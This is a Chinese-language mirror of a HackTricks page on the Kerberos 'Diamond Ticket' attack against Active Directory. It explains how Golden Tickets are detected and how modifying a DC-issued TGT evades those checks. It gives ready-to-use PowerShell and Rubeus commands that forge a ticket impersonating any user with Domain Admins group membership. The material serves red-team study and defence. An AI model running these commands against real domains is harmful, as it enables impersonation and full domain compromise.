mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 15:12:11 +00:00
3.7 KiB
3.7 KiB
钻石票据
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 探索PEASS家族,我们的独家NFTs
- 加入 💬 Discord群组 或 电报群组 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
钻石票据
类似于黄金票据,钻石票据是一种TGT,可用于以任何用户身份访问任何服务。 黄金票据完全是离线伪造的,使用该域的krbtgt哈希进行加密,然后传递到登录会话中供使用。 因为域控制器不会跟踪它(或它们)合法发行的TGT,所以它们会乐意接受用其自身krbtgt哈希加密的TGT。
检测黄金票据使用的两种常见技术:
- 查找没有相应AS-REQ的TGS-REQ。
- 查找具有荒谬值的TGT,例如Mimikatz的默认10年生存期。
钻石票据是通过修改由DC发行的合法TGT的字段而制作的。 这是通过请求一个TGT,使用域的krbtgt哈希解密它,修改票据的所需字段,然后重新加密它来实现的。 这克服了黄金票据的上述两个缺点,因为:
- TGS-REQ将有一个先前的AS-REQ。
- TGT是由DC发行的,这意味着它将具有来自域Kerberos策略的所有正确详细信息。 即使在黄金票据中可以准确伪造这些信息,但这更加复杂且容易出错。
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid
.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512
# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
其他支持HackTricks的方式:
- 如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
- 获取官方PEASS & HackTricks周边产品
- 发现我们的独家[NFTs]收藏品,The PEASS Family
- 加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
- 通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。